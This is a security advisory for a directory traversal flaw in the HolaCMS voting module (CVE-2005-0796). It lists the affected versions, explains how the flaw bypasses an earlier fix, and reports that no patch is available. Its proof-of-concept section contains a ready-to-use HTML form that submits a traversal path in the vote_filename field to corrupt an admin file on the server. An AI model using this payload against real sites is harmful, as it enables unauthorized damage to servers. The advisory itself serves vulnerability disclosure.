BID:12799

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability

Info

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability

Bugtraq ID:	12799
Class:	Input Validation Error
CVE:	CVE-2005-0796
Remote:	Yes
Local:	No
Published:	Mar 13 2005 12:00AM
Updated:	Jul 12 2009 10:56AM
Credit:	Discovery is credited to Virginity Security.
Vulnerable:	Hola HolaCMS 1.4.9 -1 Hola HolaCMS 1.4.9 Hola HolaCMS 1.4.8 Hola HolaCMS 1.4.7 Hola HolaCMS 1.4.6 Hola HolaCMS 1.4.5 Hola HolaCMS 1.4.4 Hola HolaCMS 1.4.3 Hola HolaCMS 1.4.2 a Hola HolaCMS 1.4.2 Hola HolaCMS 1.4.1 Hola HolaCMS 1.4 Hola HolaCMS 1.2.10 Hola HolaCMS 1.2.9

Not Vulnerable:

Discussion

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability

HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server.

This issue is similar to the vulnerability described in BID 12789 (HolaCMS Voting Module Remote File Corruption Vulnerability). It is reported that HolaCMS 1.4.9-1, which was released to address the issue in BID 12789 is still vulnerable to a variant of that issue.

Specifically, an attacker can bypass the fix introduced in HolaCMS 1.4.9-1 by including directory traversal sequences in the path to a target file.

HolaCMS 1.4.9-1 and prior versions are affected by this issue.

Exploit / POC

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability

The following example was provided using a form to submit a custom HTTP POST to the site:

<form action="http://www.example.com/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>

Solution / Fix

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

HolaCMS Voting Module Directory Traversal Remote File Corruption Vulnerability

References:

Hola CMS (Hola)